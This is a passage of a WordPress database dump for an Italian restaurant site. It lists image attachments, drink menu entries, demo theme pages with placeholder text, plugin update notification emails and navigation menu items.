13:16:02','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/07/shop-img-7.jpg',0,'attachment','image/jpeg',0),(4280,1,'2018-07-31 08:57:14','2018-07-31 08:57:14','','h1-single-img-2','','inherit','open','closed','','h1-single-img-2','','','2018-07-31 08:57:14','2018-07-31 08:57:14','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/07/h1-single-img-2.jpg',0,'attachment','image/jpeg',0),(4281,1,'2018-08-08 11:03:13','2018-08-08 11:03:13','','kitchen-right-img','','inherit','open','closed','','kitchen-right-img','','','2018-08-08 11:03:13','2018-08-08 11:03:13','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/kitchen-right-img.jpg',0,'attachment','image/jpeg',0),(4282,1,'2018-07-31 13:41:46','2018-07-31 13:41:46','','shop-img-19','','inherit','open','closed','','shop-img-19','','','2018-07-31 13:41:46','2018-07-31 13:41:46','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/07/shop-img-19.jpg',0,'attachment','image/jpeg',0),(4283,1,'2018-07-31 08:57:17','2018-07-31 08:57:17','','h1-single-img-3','','inherit','open','closed','','h1-single-img-3','','','2018-07-31 08:57:17','2018-07-31 08:57:17','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/07/h1-single-img-3.jpg',0,'attachment','image/jpeg',0),(4284,1,'2018-08-06 14:09:30','2018-08-06 14:09:30','','h8-img-4','','inherit','open','closed','','h8-img-4','','','2018-08-06 14:09:30','2018-08-06 14:09:30','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/h8-img-4.jpg',0,'attachment','image/jpeg',0),(4285,1,'2018-07-30 13:16:05','2018-07-30 13:16:05','','shop-img-8','','inherit','open','closed','','shop-img-8','','','2018-07-30 13:16:05','2018-07-30 13:16:05','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/07/shop-img-8.jpg',0,'attachment','image/jpeg',0),(4286,1,'2018-08-03 14:29:47','2018-08-03 14:29:47','','shop-img-24','','inherit','open','closed','','shop-img-24','','','2018-08-03 14:29:47','2018-08-03 14:29:47','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/shop-img-24.jpg',0,'attachment','image/jpeg',0),(171,1,'2018-07-31 08:57:20','2018-07-31 08:57:20','','h1-single-img-4','','inherit','open','closed','','h1-single-img-4','','','2018-07-31 08:57:20','2018-07-31 08:57:20','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/07/h1-single-img-4.jpg',0,'attachment','image/jpeg',0),(4287,1,'2018-07-31 13:41:50','2018-07-31 13:41:50','','shop-img-20','','inherit','open','closed','','shop-img-20','','','2018-07-31 13:41:50','2018-07-31 13:41:50','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/07/shop-img-20.jpg',0,'attachment','image/jpeg',0),(46,1,'2018-07-30 13:16:09','2018-07-30 13:16:09','','shop-img-9','','inherit','open','closed','','shop-img-9','','','2018-07-30 13:16:09','2018-07-30 13:16:09','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/07/shop-img-9.jpg',0,'attachment','image/jpeg',0),(4288,1,'2018-08-06 14:14:05','2018-08-06 14:14:05','','h8-img-5','','inherit','open','closed','','h8-img-5','','','2018-08-06 14:14:05','2018-08-06 14:14:05','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/h8-img-5.jpg',0,'attachment','image/jpeg',0),(4289,1,'2018-08-08 12:16:41','2018-08-08 12:16:41','','h1-img-2','','inherit','open','closed','','h1-img-2','','','2018-08-08 12:16:41','2018-08-08 12:16:41','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/h1-img-2.jpg',0,'attachment','image/jpeg',0),(4290,1,'2018-08-03 14:29:50','2018-08-03 14:29:50','','shop-img-25','','inherit','open','closed','','shop-img-25','','','2018-08-03 14:29:50','2018-08-03 14:29:50','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/shop-img-25.jpg',0,'attachment','image/jpeg',0),(4291,1,'2018-08-06 14:22:06','2018-08-06 14:22:06','','h8-img-6','','inherit','open','closed','','h8-img-6','','','2018-08-06 14:22:06','2018-08-06 14:22:06','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/h8-img-6.jpg',0,'attachment','image/jpeg',0),(4292,1,'2018-07-31 13:41:54','2018-07-31 13:41:54','','shop-img-21','','inherit','open','closed','','shop-img-21','','','2018-07-31 13:41:54','2018-07-31 13:41:54','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/07/shop-img-21.jpg',0,'attachment','image/jpeg',0),(4293,1,'2018-07-31 09:22:13','2018-07-31 09:22:13','','h1-img-7','','inherit','open','closed','','h1-img-7','','','2018-07-31 09:22:13','2018-07-31 09:22:13','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/07/h1-img-7.jpg',0,'attachment','image/jpeg',0),(4294,1,'2018-07-30 13:16:12','2018-07-30 13:16:12','','shop-img-10','','inherit','open','closed','','shop-img-10','','','2018-07-30 13:16:12','2018-07-30 13:16:12','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/07/shop-img-10.jpg',0,'attachment','image/jpeg',0),(4295,1,'2018-08-08 12:30:03','2018-08-08 12:30:03','','h1-img-3','','inherit','open','closed','','h1-img-3','','','2018-08-08 12:30:03','2018-08-08 12:30:03','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/h1-img-3.jpg',0,'attachment','image/jpeg',0),(4296,1,'2018-08-03 14:29:53','2018-08-03 14:29:53','','shop-img-26','','inherit','open','closed','','shop-img-26','','','2018-08-03 14:29:53','2018-08-03 14:29:53','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/shop-img-26.jpg',0,'attachment','image/jpeg',0),(1346,1,'2018-08-15 08:58:46','2018-08-15 08:58:46','','Layered Hummus Dip','','publish','closed','closed','','layered-hummus-dip','','','2018-08-15 08:58:46','2018-08-15 08:58:46','',0,'http://attika.mikado-themes.com/?post_type=restaurant-menu&amp;p=1346',0,'restaurant-menu','',0),(1348,1,'2018-08-15 09:11:27','2018-08-15 09:11:27','','Corona Buckets','','publish','closed','closed','','new-belgium-ranger','','','2018-08-15 09:11:27','2018-08-15 09:11:27','',0,'http://attika.mikado-themes.com/?post_type=restaurant-menu&amp;p=1348',0,'restaurant-menu','',0),(1349,1,'2018-08-15 09:13:04','2018-08-15 09:13:04','','Bud Buckets','','publish','closed','closed','','bud-buckets','','','2018-08-15 09:13:04','2018-08-15 09:13:04','',0,'http://attika.mikado-themes.com/?post_type=restaurant-menu&amp;p=1349',0,'restaurant-menu','',0),(1350,1,'2018-08-15 09:18:02','2018-08-15 09:18:02','','Malbec, Dona Paula','','publish','closed','closed','','malbec-dona-paula','','','2018-08-15 09:18:02','2018-08-15 09:18:02','',0,'http://attika.mikado-themes.com/?post_type=restaurant-menu&amp;p=1350',0,'restaurant-menu','',0),(1351,1,'2018-08-15 09:18:17','2018-08-15 09:18:17','','Merlot, 14 Hands','','publish','closed','closed','','merlot-14-hands','','','2018-08-15 09:18:17','2018-08-15 09:18:17','',0,'http://attika.mikado-themes.com/?post_type=restaurant-menu&amp;p=1351',0,'restaurant-menu','',0),(1352,1,'2018-08-15 09:18:46','2018-08-15 09:18:46','','Chardonnay, Hands of Time','','publish','closed','closed','','chardonnay-hands-of-time','','','2018-08-15 09:18:46','2018-08-15 09:18:46','',0,'http://attika.mikado-themes.com/?post_type=restaurant-menu&amp;p=1352',0,'restaurant-menu','',0),(1353,1,'2018-08-15 09:19:08','2018-08-15 09:19:08','','Moscato','','publish','closed','closed','','moscato','','','2018-08-15 09:19:08','2018-08-15 09:19:08','',0,'http://attika.mikado-themes.com/?post_type=restaurant-menu&amp;p=1353',0,'restaurant-menu','',0),(1354,1,'2018-08-15 09:20:12','2018-08-15 09:20:12','','Riesling','','publish','closed','closed','','riesling','','','2018-08-15 09:20:12','2018-08-15 09:20:12','',0,'http://attika.mikado-themes.com/?post_type=restaurant-menu&amp;p=1354',0,'restaurant-menu','',0),(1355,1,'2018-08-15 09:25:20','2018-08-15 09:25:20','','Painkiller','','publish','closed','closed','','painkiller','','','2018-08-15 09:25:20','2018-08-15 09:25:20','',0,'http://attika.mikado-themes.com/?post_type=restaurant-menu&amp;p=1355',0,'restaurant-menu','',0),(1356,1,'2018-08-15 09:25:54','2018-08-15 09:25:54','','Grey Goose Mule','','publish','closed','closed','','grey-goose-mule','','','2018-08-15 09:25:54','2018-08-15 09:25:54','',0,'http://attika.mikado-themes.com/?post_type=restaurant-menu&amp;p=1356',0,'restaurant-menu','',0),(1357,1,'2018-08-15 09:27:02','2018-08-15 09:27:02','','Cinnamon Toast Crunch','','publish','closed','closed','','cinnamon-toast-crunch','','','2018-08-15 09:27:02','2018-08-15 09:27:02','',0,'http://attika.mikado-themes.com/?post_type=restaurant-menu&amp;p=1357',0,'restaurant-menu','',0),(1358,1,'2018-08-15 09:27:28','2018-08-15 09:27:28','','Rum Punch','','publish','closed','closed','','rum-punch','','','2018-08-15 09:27:28','2018-08-15 09:27:28','',0,'http://attika.mikado-themes.com/?post_type=restaurant-menu&amp;p=1358',0,'restaurant-menu','',0),(1360,1,'2018-08-15 09:31:32','2018-08-15 09:31:32','','Cruzan Classic Mojito','','publish','closed','closed','','cruzan-classic-mojito','','','2018-08-15 09:31:32','2018-08-15 09:31:32','',0,'http://attika.mikado-themes.com/?post_type=restaurant-menu&amp;p=1360',0,'restaurant-menu','',0),(1361,1,'2018-08-15 09:29:49','2018-08-15 09:29:49','','Long Island Ice Tea Pitcher','','publish','closed','closed','','long-island-ice-tea-pitcher','','','2018-08-15 09:29:49','2018-08-15 09:29:49','',0,'http://attika.mikado-themes.com/?post_type=restaurant-menu&amp;p=1361',0,'restaurant-menu','',0),(1362,1,'2018-08-15 09:30:45','2018-08-15 09:30:45','','Watermelon Margarita Pitcher','','publish','closed','closed','','watermelon-margarita-pitcher','','','2018-08-15 09:30:45','2018-08-15 09:30:45','',0,'http://attika.mikado-themes.com/?post_type=restaurant-menu&amp;p=1362',0,'restaurant-menu','',0),(1363,1,'2018-08-15 09:31:02','2018-08-15 09:31:02','','Mojito Pitcher','','publish','closed','closed','','mojito-pitcher','','','2018-08-15 09:31:02','2018-08-15 09:31:02','',0,'http://attika.mikado-themes.com/?post_type=restaurant-menu&amp;p=1363',0,'restaurant-menu','',0),(4335,1,'2018-08-10 14:13:51','2018-08-10 14:13:51','','h3-img-gallery-7','','inherit','open','closed','','h3-img-gallery-7','','','2018-08-10 14:13:51','2018-08-10 14:13:51','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/h3-img-gallery-7.jpg',0,'attachment','image/jpeg',0),(1382,1,'2018-08-15 13:37:30','2018-08-15 13:37:30','[vc_row row_content_width=\"grid\" css=\".vc_custom_1534406296284{padding-bottom: 60px !important;}\"][vc_column offset=\"vc_col-lg-offset-0 vc_col-lg-6 vc_col-md-offset-0 vc_col-md-12 vc_col-sm-offset-0 vc_col-xs-12\"][mkdf_tabs type=\"standard\"][mkdf_tabs_item tab_title=\"Our History\"][vc_column_text]Proin gravida nibh vel velit auctor aliqu utate cursus a sit amet mauris. Morbi accumsan ipsum velit. Nam nec tellus a odio tincidunt auctor a ornare odio. Sed non mauris vitae erat.[/vc_column_text][/mkdf_tabs_item][mkdf_tabs_item tab_title=\"Our story\"][vc_column_text]Class aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos himenaeos. Mauris in erat justo. Nullam ac urna eu felis dapibus condimentum sit amet a augue. Sed non neque elit.[/vc_column_text][/mkdf_tabs_item][mkdf_tabs_item tab_title=\"About us\"][vc_column_text]Nullam ac urna eu felis dapibus condimentum sit amet a augue. Sed non neque elit. Sed ut imperdiet nisi. Proin condimentum fermentum nunc. Etiam pharetra, erat sed fermentum feugiat.[/vc_column_text][/mkdf_tabs_item][/mkdf_tabs][vc_empty_space height=\"50px\"][/vc_column][vc_column offset=\"vc_col-lg-offset-0 vc_col-lg-6 vc_col-md-offset-0 vc_col-md-12 vc_col-sm-offset-0 vc_col-xs-12\"][mkdf_tabs type=\"boxed\"][mkdf_tabs_item tab_title=\"Our history\"][vc_column_text]Proin gravida nibh vel velit auctor aliqu utate cursus a sit amet mauris. Morbi accumsan ipsum velit. Nam nec tellus a odio tincidunt auctor a ornare odio. Sed non mauris vitae erat.[/vc_column_text][/mkdf_tabs_item][mkdf_tabs_item tab_title=\"Our story\"][vc_column_text]Class aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos himenaeos. Mauris in erat justo. Nullam ac urna eu felis dapibus condimentum sit amet a augue. Sed non neque elit.[/vc_column_text][/mkdf_tabs_item][mkdf_tabs_item tab_title=\"About us\"][vc_column_text]Nullam ac urna eu felis dapibus condimentum sit amet a augue. Sed non neque elit. Sed ut imperdiet nisi. Proin condimentum fermentum nunc. Etiam pharetra, erat sed fermentum feugiat.[/vc_column_text][/mkdf_tabs_item][/mkdf_tabs][vc_empty_space height=\"50px\"][/vc_column][/vc_row][vc_row row_content_width=\"grid\" css=\".vc_custom_1535121294485{padding-top: 100px !important;padding-bottom: 120px !important;}\" simple_background_color=\"#f5f7f8\"][vc_column offset=\"vc_col-lg-offset-0 vc_col-md-offset-0 vc_col-sm-offset-0\"][mkdf_tabs type=\"simple\"][mkdf_tabs_item tab_title=\"Our History\"][vc_column_text]Proin gravida nibh vel velit auctor aliqu utate cursus a sit amet mauris. Morbi accumsan ipsum velit. Nam nec tellus a odio tincidunt auctor a ornare odio. Sed non mauris vitae erat consequat auctor eu in elit. Class aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos himenaeos. Mauris in erat justo. Nullam ac urna eu felis dapibus condimentum sit amet a augue. Sed non neque elit. Sed ut imperdiet nisi.[/vc_column_text][/mkdf_tabs_item][mkdf_tabs_item tab_title=\"Our Story\"][vc_column_text]Class aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos himenaeos. Mauris in erat justo. Nullam ac urna eu felis dapibus condimentum sit amet a augue. Sed non neque elit. Sed ut imperdiet nisi. Proin condimentum fermentum nunc. Etiam pharetra, erat sed fermentum feugiat, velit mauris egestas quam, ut aliimentum sit amet a augue. Proin gravida nibh vel velit auctor aliqu utate cursus a sit amet mauris.[/vc_column_text][/mkdf_tabs_item][mkdf_tabs_item tab_title=\"About us\"][vc_column_text]Nullam ac urna eu felis dapibus condimentum sit amet a augue. Sed non neque elit. Sed ut imperdiet nisi. Proin condimentum fermentum nunc. Etiam pharetra, erat sed fermentum feugiat, velit mauris egestas quam, ut aliimentum sit amet a augue. Proin gravida nibh vel velit auctor aliqu utate cursus a sit amet mauris. Morbi accumsan ipsum velit. Nam nec. Class aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos himenaeos.[/vc_column_text][/mkdf_tabs_item][/mkdf_tabs][/vc_column][/vc_row][vc_row row_content_width=\"grid\" css=\".vc_custom_1534406366001{padding-top: 100px !important;}\"][vc_column offset=\"vc_col-lg-offset-0 vc_col-lg-12 vc_col-md-offset-0 vc_col-md-12 vc_col-sm-offset-0 vc_col-xs-12\"][mkdf_tabs type=\"vertical\"][mkdf_tabs_item tab_title=\"Our History\"][vc_column_text]Proin gravida nibh vel velit auctor aliqu utate cursus a sit amet mauris. Morbi accumsan ipsum velit. Nam nec tellus a odio tincidunt auctor a ornare odio. Sed non mauris vitae erat consequat auctor eu in elit. Class aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos himenaeos. Mauris in erat justo. Nullam ac urna eu felis dapibus condimentum sit amet a augue. Sed non neque elit. Sed ut imperdiet nisi. Proin condimentum fermentum nunc.[/vc_column_text][/mkdf_tabs_item][mkdf_tabs_item tab_title=\"Our Story\"][vc_column_text]Class aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos himenaeos. Mauris in erat justo. Nullam ac urna eu felis dapibus condimentum sit amet a augue. Sed non neque elit. Sed ut imperdiet nisi. Proin condimentum fermentum nunc. Etiam pharetra, erat sed fermentum feugiat, velit mauris egestas quam, ut aliimentum sit amet a augue. Proin gravida nibh vel velit auctor aliqu utate cursus a sit amet mauris. Morbi accumsan ipsum velit.[/vc_column_text][/mkdf_tabs_item][mkdf_tabs_item tab_title=\"About us\"][vc_column_text]Nullam ac urna eu felis dapibus condimentum sit amet a augue. Sed non neque elit. Sed ut imperdiet nisi. Proin condimentum fermentum nunc. Etiam pharetra, erat sed fermentum feugiat, velit mauris egestas quam, ut aliimentum sit amet a augue. Proin gravida nibh vel velit auctor aliqu utate cursus a sit amet mauris. Morbi accumsan ipsum velit. Nam nec. Class aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos himenaeos. Mauris in erat justo.[/vc_column_text][/mkdf_tabs_item][/mkdf_tabs][/vc_column][/vc_row]','Tabs','','publish','closed','closed','','tabs','','','2018-08-15 13:37:30','2018-08-15 13:37:30','',3039,'http://attika.mikado-themes.com/?page_id=1382',0,'page','',0),(1393,1,'2018-08-15 15:06:11','2018-08-15 15:06:11','[vc_row row_content_width=\"grid\"][vc_column][mkdf_testimonials skin=\"\" slider_loop=\"yes\" slider_autoplay=\"yes\" slider_navigation=\"yes\" enable_navigation_numbers=\"yes\" navigation_number_position=\"outer\" slider_pagination=\"no\" number=\"3\" category=\"testimonials-1\"][/vc_column][/vc_row]','Testimonials','','publish','closed','closed','','testimonials','','','2018-08-15 15:06:11','2018-08-15 15:06:11','',3039,'http://attika.mikado-themes.com/?page_id=1393',0,'page','',0),(3717,0,'2021-01-18 13:24:14','2021-01-18 12:24:14','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- Cookie and Consent Solution for the GDPR &amp; ePrivacy (from version 2.3.15 to 2.3.16)\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team','[Sol Y Mar] Some plugins were automatically updated','Sent ( ** Fallback ** )','private','closed','closed','','sol-y-mar-some-plugins-were-automatically-updated-33','','','2021-01-18 13:24:14','2021-01-18 12:24:14','',0,'https://www.ristorantesolymar.it/postman_sent_mail/sol-y-mar-some-plugins-were-automatically-updated-33/',0,'postman_sent_mail','',0),(3718,0,'2021-01-20 01:26:08','2021-01-20 00:26:08','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- Post SMTP (from version 2.0.18 to 2.0.19)\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team','[Sol Y Mar] Some plugins were automatically updated','Incorrect authentication data\r\n','private','closed','closed','','sol-y-mar-some-plugins-were-automatically-updated-34','','','2021-01-20 01:26:08','2021-01-20 00:26:08','',0,'https://www.ristorantesolymar.it/postman_sent_mail/sol-y-mar-some-plugins-were-automatically-updated-34/',0,'postman_sent_mail','',0),(3719,0,'2021-01-20 01:26:08','2021-01-20 00:26:08','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- Post SMTP (from version 2.0.18 to 2.0.19)\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team','[Sol Y Mar] Some plugins were automatically updated','Sent ( ** Fallback ** )','private','closed','closed','','sol-y-mar-some-plugins-were-automatically-updated-35','','','2021-01-20 01:26:08','2021-01-20 00:26:08','',0,'https://www.ristorantesolymar.it/postman_sent_mail/sol-y-mar-some-plugins-were-automatically-updated-35/',0,'postman_sent_mail','',0),(1527,1,'2018-08-16 15:47:36','2018-08-16 15:47:36','','h3-bottom-single-img','','inherit','open','closed','','h3-bottom-single-img','','','2018-08-16 15:47:36','2018-08-16 15:47:36','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/h3-bottom-single-img.png',0,'attachment','image/png',0),(4336,1,'2018-08-14 13:51:17','2018-08-14 13:51:17','','h5-img-4','','inherit','open','closed','','h5-img-4','','','2018-08-14 13:51:17','2018-08-14 13:51:17','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/h5-img-4.jpg',0,'attachment','image/jpeg',0),(4337,1,'2018-08-13 08:50:15','2018-08-13 08:50:15','','h2-port-img-3a','','inherit','open','closed','','h2-port-img-3a','','','2018-08-13 08:50:15','2018-08-13 08:50:15','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/h2-port-img-3a.jpg',0,'attachment','image/jpeg',0),(1570,1,'2018-08-17 11:36:31','2018-08-17 11:36:31','','coming-soon-backround','','inherit','open','closed','','coming-soon-backround','','','2018-08-17 11:36:31','2018-08-17 11:36:31','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/coming-soon-backround.jpg',0,'attachment','image/jpeg',0),(3730,1,'2021-01-20 18:24:32','2021-01-20 17:24:32','','Portfolio','','publish','closed','closed','','portfolio-10','','','2021-01-20 18:24:32','2021-01-20 17:24:32','',0,'https://www.ristorantesolymar.it/2021/01/20/portfolio-10/',22,'nav_menu_item','',0),(3731,1,'2021-01-20 18:24:32','2021-01-20 17:24:32','','Shop','','publish','closed','closed','','shop-10','','','2021-01-20 18:24:32','2021-01-20 17:24:32','',0,'https://www.ristorantesolymar.it/2021/01/20/shop-10/',1,'nav_menu_item','',0),(3732,1,'2021-01-20 18:24:32','2021-01-20 17:24:32','','Blog','','publish','closed','closed','','blog-10','','','2021-01-20 18:24:32','2021-01-20 17:24:32','',0,'https://www.ristorantesolymar.it/2021/01/20/blog-10/',13,'nav_menu_item','',0),(3733,1,'2021-01-20 18:24:32','2021-01-20 17:24:32','','Elements','','publish','closed','closed','','elements-6','','','2021-01-20 18:24:32','2021-01-20 17:24:32','',0,'https://www.ristorantesolymar.it/2021/01/20/elements-6/',24,'nav_menu_item','',0),(3734,1,'2021-01-20 18:24:32','2021-01-20 17:24:32','','Home','','publish','closed','closed','','home-11','','','2021-01-20 18:24:32','2021-01-20 17:24:32','',0,'https://www.ristorantesolymar.it/2021/01/20/home-11/',1,'nav_menu_item','',0),(3735,1,'2021-01-20 18:24:32','2021-01-20 17:24:32','','Pages','','publish','closed','closed','','pages-11','','','2021-01-20 18:24:32','2021-01-20 17:24:32','',0,'https://www.ristorantesolymar.it/2021/01/20/pages-11/',6,'nav_menu_item','',0),(3736,1,'2021-01-20 18:24:32','2021-01-20 17:24:32','','Shop','','publish','closed','closed','','shop-11','','','2021-01-20 18:24:32','2021-01-20 17:24:32','',0,'https://www.ristorantesolymar.it/2021/01/20/shop-11/',19,'nav_menu_item','',0),(3737,1,'2021-01-20 18:24:32','2021-01-20 17:24:32','','Portfolio','','publish','closed','closed','','portfolio-11','','','2021-01-20 18:24:32','2021-01-20 17:24:32','',0,'https://www.ristorantesolymar.it/2021/01/20/portfolio-11/',11,'nav_menu_item','',0),(3738,1,'2021-01-20 18:24:32','2021-01-20 17:24:32','','Blog','','publish','closed','closed','','blog-11','','','2021-01-20 18:24:32','2021-01-20 17:24:32','',0,'https://www.ristorantesolymar.it/2021/01/20/blog-11/',15,'nav_menu_item','',0),(3739,1,'2021-01-20 18:24:32','2021-01-20 17:24:32','','Home','','publish','closed','closed','','home-12','','','2021-01-20 18:24:32','2021-01-20 17:24:32','',0,'https://www.ristorantesolymar.it/2021/01/20/home-12/',1,'nav_menu_item','',0),(3740,1,'2021-01-20 18:24:32','2021-01-20 17:24:32','','Pages','','publish','closed','closed','','pages-12','','','2021-01-20 18:24:32','2021-01-20 17:24:32','',0,'https://www.ristorantesolymar.it/2021/01/20/pages-12/',6,'nav_menu_item','',0),(3741,1,'2021-01-20 18:24:32','2021-01-20 17:24:32','','Shop','','publish','closed','closed','','shop-12','','','2021-01-20 18:24:32','2021-01-20 17:24:32','',0,'https://www.ristorantesolymar.it/2021/01/20/shop-12/',15,'nav_menu_item','',0),(3742,1,'2021-01-20 18:24:32','2021-01-20 17:24:32','','Blog','','publish','closed','closed','','blog-12','','','2021-01-20 18:24:32','2021-01-20 17:24:32','',0,'https://www.ristorantesolymar.it/2021/01/20/blog-12/',11,'nav_menu_item','',0),(3743,1,'2021-01-20 18:24:32','2021-01-20 17:24:32','','Product Single','','publish','closed','closed','','product-single-9','','','2021-01-20 18:24:32','2021-01-20 17:24:32','',0,'https://www.ristorantesolymar.it/2021/01/20/product-single-9/',35,'nav_menu_item','',0),(3744,1,'2021-01-20 18:24:32','2021-01-20 17:24:32','','Shop Layouts','','publish','closed','closed','','shop-layouts-5','','','2021-01-20 18:24:32','2021-01-20 17:24:32','',0,'https://www.ristorantesolymar.it/2021/01/20/shop-layouts-5/',36,'nav_menu_item','',0),(3745,1,'2021-01-20 18:24:32','2021-01-20 17:24:32','','Shop Pages','','publish','closed','closed','','shop-pages-5','','','2021-01-20 18:24:32','2021-01-20 17:24:32','',0,'https://www.ristorantesolymar.it/2021/01/20/shop-pages-5/',40,'nav_menu_item','',0),(3746,1,'2021-01-20 18:24:32','2021-01-20 17:24:32','','Product Single','','publish','closed','closed','','product-single-10','','','2021-01-20 18:24:32','2021-01-20 17:24:32','',0,'https://www.ristorantesolymar.it/2021/01/20/product-single-10/',3,'nav_menu_item','',0),(3747,1,'2021-01-20 18:24:32','2021-01-20 17:24:32','','Shop Layouts','','publish','closed','closed','','shop-layouts-6','','','2021-01-20 18:24:32','2021-01-20 17:24:32','',0,'https://www.ristorantesolymar.it/2021/01/20/shop-layouts-6/',4,'nav_menu_item','',0),(3748,1,'2021-01-20 18:24:32','2021-01-20 17:24:32','','Shop Pages','','publish','closed','closed','','shop-pages-6','','','2021-01-20 18:24:32','2021-01-20 17:24:32','',0,'https://www.ristorantesolymar.it/2021/01/20/shop-pages-6/',8,'nav_menu_item','',0),(3749,1,'2021-01-20 18:24:32','2021-01-20 17:24:32','','Product Single','','publish','closed','closed','','product-single-11','','','2021-01-20 18:24:32','2021-01-20 17:24:32','',0,'https://www.ristorantesolymar.it/2021/01/20/product-single-11/',21,'nav_menu_item','',0),(3750,1,'2021-01-20 18:24:32','2021-01-20 17:24:32','','Product Single','','publish','closed','closed','','product-single-12','','','2021-01-20 18:24:32','2021-01-20 17:24:32','',0,'https://www.ristorantesolymar.it/2021/01/20/product-single-12/',17,'nav_menu_item','',0),(3751,1,'2021-01-20 18:24:32','2021-01-20 17:24:32','','Classic','','publish','closed','closed','','classic-5','','','2021-01-20 18:24:32','2021-01-20 17:24:32','',0,'https://www.ristorantesolymar.it/2021/01/20/classic-5/',69,'nav_menu_item','',0),(3752,1,'2021-01-20 18:24:32','2021-01-20 17:24:32','','Presentation','','publish','closed','closed','','presentation-5','','','2021-01-20 18:24:32','2021-01-20 17:24:32','',0,'https://www.ristorantesolymar.it/2021/01/20/presentation-5/',78,'nav_menu_item','',0),(3753,1,'2021-01-20 18:24:32','2021-01-20 17:24:32','','Infographic','','publish','closed','closed','','infographic-5','','','2021-01-20 18:24:32','2021-01-20 17:24:32','',0,'https://www.ristorantesolymar.it/2021/01/20/infographic-5/',86,'nav_menu_item','',0),(3754,1,'2021-01-20 18:24:32','2021-01-20 17:24:32','','Typography','','publish','closed','closed','','typography-5','','','2021-01-20 18:24:32','2021-01-20 17:24:32','',0,'https://www.ristorantesolymar.it/2021/01/20/typography-5/',95,'nav_menu_item','',0),(3755,1,'2021-01-20 18:24:32','2021-01-20 17:24:32','','Classic','','publish','closed','closed','','classic-6','','','2021-01-20 18:24:32','2021-01-20 17:24:32','',0,'https://www.ristorantesolymar.it/2021/01/20/classic-6/',25,'nav_menu_item','',0),(3756,1,'2021-01-20 18:24:33','2021-01-20 17:24:33','','Presentation','','publish','closed','closed','','presentation-6','','','2021-01-20 18:24:33','2021-01-20 17:24:33','',0,'https://www.ristorantesolymar.it/2021/01/20/presentation-6/',34,'nav_menu_item','',0),(3757,1,'2021-01-20 18:24:33','2021-01-20 17:24:33','','Infographic','','publish','closed','closed','','infographic-6','','','2021-01-20 18:24:33','2021-01-20 17:24:33','',0,'https://www.ristorantesolymar.it/2021/01/20/infographic-6/',42,'nav_menu_item','',0),(3758,1,'2021-01-20 18:24:33','2021-01-20 17:24:33','','Typography','','publish','closed','closed','','typography-6','','','2021-01-20 18:24:33','2021-01-20 17:24:33','',0,'https://www.ristorantesolymar.it/2021/01/20/typography-6/',51,'nav_menu_item','',0),(3759,1,'2021-01-20 18:24:33','2021-01-20 17:24:33','','Single Types','','publish','closed','closed','','single-types-7','','','2021-01-20 18:24:33','2021-01-20 17:24:33','',0,'https://www.ristorantesolymar.it/2021/01/20/single-types-7/',62,'nav_menu_item','',0),(3760,1,'2021-01-20 18:24:33','2021-01-20 17:24:33','','Post Types','','publish','closed','closed','','post-types-5','','','2021-01-20 18:24:33','2021-01-20 17:24:33','',0,'https://www.ristorantesolymar.it/2021/01/20/post-types-5/',17,'nav_menu_item','',0),(3761,1,'2021-01-20 18:24:33','2021-01-20 17:24:33','','Post Types','','publish','closed','closed','','post-types-6','','','2021-01-20 18:24:33','2021-01-20 17:24:33','',0,'https://www.ristorantesolymar.it/2021/01/20/post-types-6/',26,'nav_menu_item','',0),(3762,1,'2021-01-20 18:24:33','2021-01-20 17:24:33','','Single Types','','publish','closed','closed','','single-types-8','','','2021-01-20 18:24:33','2021-01-20 17:24:33','',0,'https://www.ristorantesolymar.it/2021/01/20/single-types-8/',39,'nav_menu_item','',0),(4338,1,'2018-08-14 13:51:19','2018-08-14 13:51:19','','h5-img-5','','inherit','open','closed','','h5-img-5','','','2018-08-14 13:51:19','2018-08-14 13:51:19','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/h5-img-5.jpg',0,'attachment','image/jpeg',0),(4339,1,'2018-08-10 14:13:54','2018-08-10 